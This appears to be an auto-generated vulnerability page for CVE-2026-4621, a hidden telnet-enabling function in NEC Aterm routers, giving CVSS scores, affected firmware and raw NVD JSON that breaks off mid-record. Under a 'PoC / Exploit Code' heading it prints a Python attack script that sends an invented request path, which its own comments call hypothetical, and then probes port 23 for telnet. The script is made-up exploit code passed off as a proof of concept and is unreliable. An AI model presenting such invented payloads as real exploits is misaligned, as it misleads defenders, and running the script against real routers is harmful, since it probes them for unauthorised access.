Security Vulnerability Report
中文
CVE-2026-4621 CVSS 5.6 MEDIUM

CVE-2026-4621

Published: 2026-03-27 12:16:21
Last Modified: 2026-04-20 15:20:07

Description

Hidden Functionality vulnerability in NEC Platforms, Ltd. Aterm Series allows a attacker to enable telnet via network.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:nec:aterm_wg1200hp4_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nec:aterm_wg1200hp4:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:nec:aterm_wg2600hs_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nec:aterm_wg2600hs:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:nec:aterm_wf1200cr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nec:aterm_wf1200cr:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:nec:aterm_wg1200cr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nec:aterm_wg1200cr:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:nec:aterm_wg2600hp4_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nec:aterm_wg2600hp4:-:*:*:*:*:*:*:* - NOT VULNERABLE
NEC Platforms, Ltd. Aterm Series (具体受影响版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import sys # Proof of Concept for CVE-2026-4621 # Description: This script attempts to trigger the hidden functionality to enable Telnet. # Note: The specific payload (magic packet) usually requires firmware analysis or reverse engineering. # This script demonstrates the network interaction logic. def send_trigger_packet(target_ip, target_port=80): try: # Construct a hypothetical payload that triggers the hidden function # In a real scenario, this byte sequence is derived from reversing the firmware. # Common patterns include specific headers or command strings. payload = b"GET /hidden_enable_telnet_endpoint HTTP/1.1\r\nHost: \r\n\r\n" print(f"[*] Sending trigger packet to {target_ip}:{target_port}...") # Create a socket connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) sock.sendall(payload) response = sock.recv(1024) print(f"[*] Received response: {response.decode('utf-8', errors='ignore')}") # Check if Telnet port (23) is now open print("[*] Checking if Telnet (port 23) is enabled...") telnet_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) telnet_sock.settimeout(2) result = telnet_sock.connect_ex((target_ip, 23)) if result == 0: print("[+] SUCCESS: Telnet port is open! Vulnerability likely exploited.") else: print("[-] FAILED: Telnet port remains closed. Payload may be incorrect or device patched.") telnet_sock.close() sock.close() except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_ip> [port]") print("Example: python poc.py 192.168.1.1 80") else: ip = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 send_trigger_packet(ip, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4621", "sourceIdentifier": "[email protected]", "published": "2026-03-27T12:16:20.910", "lastModified": "2026-04-20T15:20:06.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hidden Functionality vulnerability in NEC Platforms, Ltd. Aterm Series allows a attacker to enable telnet via network."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-912"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nec:aterm_wg1200hp4_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "ABEF9893-7104-4EFB-8504-58F2B8CF95D4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nec:aterm_wg1200hp4:-:*:*:*:*:*:*:*", "matchCriteriaId": "5A89DF7B-F002-43C6-BD55-AD93A12522E5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nec:aterm_wg2600hs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.2", "matchCriteriaId": "B9BC68AC-B83D-4E0B-9B8D-23477CE698B5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nec:aterm_wg2600hs:-:*:*:*:*:*:*:*", "matchCriteriaId": "623C9C7B-C947-49A8-9C1D-20B23FDA73ED"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nec:aterm_wf1200cr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.0", "matchCriteriaId": "FE8EF43A-B179-4352-A9C9-09A13AEB63AC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nec:aterm_wf1200cr:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A91D9EB-5962-498E-9B14-C5712DDDF7C2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nec:aterm_wg1200cr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "D1BD83BE-3C42-417E-838F-A5D6FB63443F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nec:aterm_wg1200cr:-:*:*:*:*:*:*:*", "matchCriteriaId": "936D9DD3-11E5-4862-B157-85B13EA06C38"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nec:aterm_wg2600hp4_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "7E67DF3D-78B9-4B64-B3D1-B3A0B9951B83"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nec:aterm_wg2600hp4:-:*:*:*:*:*:*:*", "matchCriteriaId": "2CA71E45-3623-423D-A1E7-FA7617A22EBD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nec:aterm_wg2600hm4_firmware:*:*:*:*:*:*:*:*", "vers ... (truncated)